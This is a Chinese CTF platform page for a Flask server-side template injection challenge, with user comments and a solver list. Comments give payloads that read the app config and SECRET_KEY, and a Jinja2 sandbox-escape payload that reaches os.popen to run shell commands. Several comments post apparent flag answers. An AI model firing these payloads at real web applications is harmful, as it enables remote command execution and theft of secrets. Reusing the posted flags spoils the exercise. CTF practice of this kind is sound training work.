Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 29025
提  示:
描  述:
Simple_SSTI_1
评论
ccsuaw 2年前

SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec

回复 13

18483555203 2年前

flag{16346b3ff029db0cedd2d4d2df81df5a}

回复 0

2027347950 2年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 1

iii1 2年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 2

DragonWE 2年前

flag{9c260fb48e0a0db7708b6f3ebe9ff732}

回复 0

iain4048 2年前

查看源代码提示找secret key value

回复 0

13663536751 2年前

flag{e0ad0234936fcd15f11c7bb0f9d587e7}

回复 0
2346254613 2年前

这个是答案吗

回复 1

啊这这 2年前

使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)

回复 3

avengert 2年前

你们这么泄题,一会儿不得刷一轮儿了啊。

回复 0

xbhgg 2年前

大神们怎么知道的参数里面放的是config。。。

回复 0

WriteUp

image
valecalida

5 金币

评分(51)

解题动态

厌弃. 攻破了该题 23小时前
香克斯呀 攻破了该题 2天前
LLawliet 攻破了该题 2天前
chenlinXdb 攻破了该题 4天前
CTF-大王 攻破了该题 5天前
青春6666 攻破了该题 7天前
wengun 攻破了该题 7天前
cxkkammt 攻破了该题 7天前
这个昵称已存在 攻破了该题 8天前
EvinZe 攻破了该题 8天前
我只有两题不会 攻破了该题 8天前
星宇Sec 攻破了该题 8天前
mystery 攻破了该题 11天前
__tian__ 攻破了该题 12天前
gysbfff 攻破了该题 12天前
ItsAllOver 攻破了该题 12天前
hzydy0_0 攻破了该题 16天前
Fredjoker 攻破了该题 16天前
CyberX 攻破了该题 17天前
xwm 攻破了该题 18天前
问题反馈